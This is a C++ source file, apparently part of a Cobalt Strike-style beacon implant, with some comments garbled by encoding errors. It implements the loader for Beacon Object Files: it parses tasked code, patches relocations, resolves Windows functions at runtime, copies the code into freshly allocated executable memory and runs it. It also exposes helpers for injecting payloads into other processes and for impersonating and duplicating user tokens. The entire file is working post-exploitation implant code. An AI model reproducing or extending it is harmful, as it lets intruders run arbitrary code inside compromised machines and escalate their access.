263 lines
8.7 KiB
C++
263 lines
8.7 KiB
C++
#include "BeaconBof.h"
|
||
|
||
|
||
void __cdecl BeaconInjectProcess(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char* arg, int a_len)
|
||
{
|
||
ProcessInject(pid, 0, hProc, payload, p_len, p_offset, arg, a_len);
|
||
}
|
||
void __cdecl BeaconInjectTemporaryProcess(PROCESS_INFORMATION* pi, char* payload, int p_len,int p_offset,char* arg,int arg_len)
|
||
{
|
||
ProcessInject(pi->dwProcessId, pi, pi->hProcess, payload, p_len, p_offset, arg, arg_len);
|
||
}
|
||
|
||
void __cdecl BeaconGetSpawnTo(BOOL x86, char* buffer, int length)
|
||
{
|
||
char path[256];
|
||
|
||
getspawntopath(path, x86);
|
||
if (length >= 256)
|
||
{
|
||
memcpy(buffer, path, 0x100u);
|
||
}
|
||
else
|
||
{
|
||
memcpy(buffer, path, length);
|
||
}
|
||
}
|
||
|
||
BOOL __cdecl SetBeaconToken(HANDLE hToken, char* buffer)
|
||
{
|
||
BeaconRevertToken();
|
||
if (!ImpersonateLoggedOnUser(hToken)
|
||
|| !DuplicateTokenEx(hToken, 0x2000000u, 0, SecurityDelegation, TokenPrimary, &pTokenHandle)
|
||
|| !ImpersonateLoggedOnUser(pTokenHandle)
|
||
|| !get_user_sid(0x100u, pTokenHandle, buffer))
|
||
{
|
||
return 0;
|
||
}
|
||
BeaconTaskOutput(buffer, strlen(buffer), 15u);
|
||
return 1;
|
||
}
|
||
|
||
BOOL __cdecl BeaconUseToken(HANDLE hToken)
|
||
{
|
||
|
||
char* buffer = (char*)malloc(256u);
|
||
memset(buffer, 0, 256);
|
||
BOOL ret = SetBeaconToken(hToken, buffer);
|
||
memset(buffer, 0, 256);
|
||
free(buffer);
|
||
return ret;
|
||
}
|
||
void __cdecl BeaconOutput(int type, char* data, int len)
|
||
{
|
||
BeaconTaskOutput(data, len, type);
|
||
}
|
||
void __cdecl BeaconPrintf(int type, char* fmt, ...)
|
||
{
|
||
va_list ArgList=0;
|
||
va_start(ArgList, fmt);
|
||
int size = vprintf(fmt, ArgList);
|
||
if (size > 0)
|
||
{
|
||
char* buffer = (char*)malloc(size + 1);
|
||
buffer[size] = 0;
|
||
vsprintf_s(buffer, size + 1, fmt, ArgList);
|
||
BeaconTaskOutput(buffer ,size, type);
|
||
memset(buffer, 0, size);
|
||
free(buffer);
|
||
}
|
||
}
|
||
void InitInternalFunctions(BeaconInternalFunctions* InternalFunctions)
|
||
{
|
||
memset(InternalFunctions, 0, 252);
|
||
InternalFunctions->LoadLibraryA = LoadLibraryA;
|
||
InternalFunctions->FreeLibrary = FreeLibrary;
|
||
InternalFunctions->GetProcAddress = GetProcAddress;
|
||
InternalFunctions->GetModuleHandleA = GetModuleHandleA;
|
||
InternalFunctions->BeaconDataParse = BeaconDataParse;
|
||
InternalFunctions->BeaconDataPtr = BeaconDataPtr;
|
||
InternalFunctions->BeaconDataInt = BeaconDataInt;
|
||
InternalFunctions->BeaconDataShort = BeaconDataShort;
|
||
InternalFunctions->BeaconDataLength = BeaconDataLength;
|
||
InternalFunctions->BeaconDataExtract = BeaconDataExtract;
|
||
InternalFunctions->BeaconFormatAlloc = BeaconFormatAlloc;
|
||
InternalFunctions->BeaconFormatReset = BeaconFormatReset;
|
||
InternalFunctions->BeaconFormatAppend = BeaconFormatAppend;
|
||
InternalFunctions->BeaconFormatPrintf = BeaconFormatPrintf;
|
||
InternalFunctions->BeaconFormatToString = BeaconFormatToString;
|
||
InternalFunctions->BeaconFormatFree = BeaconFormatFree;
|
||
InternalFunctions->BeaconFormatInt = BeaconFormatInt;
|
||
InternalFunctions->BeaconOutput = BeaconOutput;
|
||
InternalFunctions->BeaconPrintf = BeaconPrintf;
|
||
InternalFunctions->BeaconErrorD = BeaconErrorD;
|
||
InternalFunctions->BeaconErrorDD = BeaconErrorDD;
|
||
InternalFunctions->BeaconErrorNA = BeaconErrorNA;
|
||
InternalFunctions->BeaconUseToken = BeaconUseToken;
|
||
InternalFunctions->BeaconRevertToken = BeaconRevertToken;
|
||
InternalFunctions->BeaconIsAdmin = is_admin;
|
||
InternalFunctions->BeaconGetSpawnTo = BeaconGetSpawnTo;
|
||
InternalFunctions->BeaconInjectProcess = BeaconInjectProcess;
|
||
InternalFunctions->BeaconInjectTemporaryProcess = BeaconInjectTemporaryProcess;
|
||
InternalFunctions->BeaconSpawnTemporaryProcess = BeaconSpawnTemporaryProcess;
|
||
InternalFunctions->BeaconCleanupProcess = BeaconcloseAllHandle;
|
||
InternalFunctions->toWideChar = toWideChar;
|
||
}
|
||
|
||
int FixRelocation(BeaconBofRelocation* pBofRelocation, char* pcode_data, char* seg, int OffsetInSection, char* bof_code)
|
||
{
|
||
if (pBofRelocation->Type == 6)
|
||
{
|
||
*(DWORD*)&pcode_data[pBofRelocation->offset] += (DWORD)&seg[OffsetInSection];
|
||
return 1;
|
||
}
|
||
if (pBofRelocation->Type == 20)
|
||
{
|
||
*(DWORD*)&pcode_data[pBofRelocation->offset] = (DWORD)&seg[*(DWORD*)&pcode_data[pBofRelocation->offset]
|
||
- pBofRelocation->offset
|
||
- (DWORD)bof_code
|
||
- 4
|
||
+ OffsetInSection];
|
||
return 1;
|
||
}
|
||
BeaconErrorD(79, pBofRelocation->Type);
|
||
return 0;
|
||
}
|
||
|
||
|
||
char* GetBeaconFunPtr(BeaconInternalFunctions* pinternalFunctions, char* pfun)
|
||
{
|
||
char** p_end = &pinternalFunctions->end;
|
||
int number = 0 ;
|
||
char** pbeaconfun = &pinternalFunctions->end;
|
||
do
|
||
{
|
||
if (*pbeaconfun == pfun)
|
||
{
|
||
return (char*)(&pinternalFunctions->end + number);
|
||
}
|
||
++number;
|
||
++pbeaconfun;
|
||
} while (number < 32);
|
||
|
||
number = 0;
|
||
while (*p_end)
|
||
{
|
||
++number;
|
||
++p_end;
|
||
if (number >= 32)
|
||
{
|
||
return 0;
|
||
}
|
||
}
|
||
char* fun = (char*)(&pinternalFunctions->end + number);
|
||
*(char**)fun = pfun;
|
||
return fun;
|
||
}
|
||
|
||
void __cdecl beacon_bof(char* Taskdata, int Tasksize)
|
||
{
|
||
|
||
BeaconInternalFunctions* internalFunctions = (BeaconInternalFunctions*)malloc(252);
|
||
InitInternalFunctions(internalFunctions);
|
||
|
||
// 4 getEntryPoint
|
||
// 4 code
|
||
// 4 rdata
|
||
// 4 data2
|
||
// 4 relocations
|
||
// 4 args
|
||
datap pdatap;
|
||
BeaconDataParse(&pdatap, Taskdata, Tasksize);
|
||
int getEntryPoint = BeaconDataInt(&pdatap);
|
||
|
||
int code_size = 0;
|
||
char* pcode = BeaconDataPtr3(&pdatap,&code_size);
|
||
|
||
int rdata_size = 0;
|
||
char* prdata = BeaconDataPtr3(&pdatap, &rdata_size);
|
||
|
||
int data2_size = 0;
|
||
char* pdata2 = BeaconDataPtr3(&pdatap, &data2_size);
|
||
|
||
int relocations_size = 0;
|
||
char* prelocations = BeaconDataPtr3(&pdatap, &relocations_size);
|
||
|
||
int alen = 0;
|
||
char* args = BeaconDataPtr3(&pdatap, &alen);
|
||
|
||
char* bof_code = (char*)VirtualAlloc(0, code_size, 0x3000u, get_short(43));
|
||
if (bof_code)
|
||
{
|
||
|
||
datap pdatap;
|
||
BeaconDataParse(&pdatap, prelocations, relocations_size);
|
||
BeaconBofRelocation* pBofRelocation = (BeaconBofRelocation*)BeaconDataPtr(&pdatap, 12);
|
||
while (1)
|
||
{
|
||
BOOL status;
|
||
short id = pBofRelocation->id;
|
||
if (id == 1028) // SYMBOL_END
|
||
{
|
||
break;
|
||
}
|
||
if (id == 1024) // SYMBOL_RDATA
|
||
{
|
||
status = FixRelocation(pBofRelocation, pcode, prdata, pBofRelocation->OffsetInSection, bof_code);//<2F><EFBFBD>rdata<74>ض<EFBFBD>λ
|
||
}
|
||
else if (id == 1025) // SYMBOL_DATA
|
||
{
|
||
status = FixRelocation(pBofRelocation, pcode, pdata2, pBofRelocation->OffsetInSection, bof_code);//<2F><EFBFBD>DATA<54><41><EFBFBD>ض<EFBFBD>λ
|
||
}
|
||
else if (id == 1026) // SYMBOL_TEXT
|
||
{
|
||
status = FixRelocation(pBofRelocation, pcode, bof_code, pBofRelocation->OffsetInSection, bof_code);//<2F><EFBFBD>code<64><65><EFBFBD>ض<EFBFBD>λ
|
||
}
|
||
else
|
||
{
|
||
char* pfun;
|
||
if (id == 1027) // SYMBOL_DYNAMICF
|
||
{
|
||
char* strModule = BeaconDataPtr2(&pdatap);
|
||
char* strFunction = BeaconDataPtr2(&pdatap);
|
||
HMODULE dllbase = GetModuleHandleA(strModule);
|
||
if (!dllbase)
|
||
{
|
||
dllbase = LoadLibraryA(strModule);
|
||
}
|
||
FARPROC functionaddress = GetProcAddress(dllbase, strFunction);
|
||
if (!functionaddress)
|
||
{
|
||
BeaconErrorFormat(76, (char*)"%s!%s", strModule, strFunction);
|
||
return;
|
||
}
|
||
char* p = GetBeaconFunPtr(internalFunctions, (char*)functionaddress);
|
||
if (!p)
|
||
{
|
||
BeaconErrorNA(0x4Eu);
|
||
return;
|
||
}
|
||
pfun = p;
|
||
}
|
||
else//<2F><EFBFBD>
|
||
{
|
||
pfun = (char*)(&internalFunctions->LoadLibraryA + id);
|
||
}
|
||
status = FixRelocation(pBofRelocation, pcode, pfun, 0, bof_code);
|
||
}
|
||
if (!status)
|
||
{
|
||
return;
|
||
}
|
||
pBofRelocation = (BeaconBofRelocation*)BeaconDataPtr(&pdatap, 12);
|
||
}
|
||
memcpy(bof_code, pcode, code_size);
|
||
memset(pcode, 0, code_size);
|
||
if (CheckMemoryRWX(bof_code, code_size))
|
||
{
|
||
((void(__cdecl*)(char*, UINT)) & bof_code[getEntryPoint])(args, alen);
|
||
}
|
||
VirtualFree(bof_code, 0, 0x8000);
|
||
free(internalFunctions);
|
||
}
|
||
} |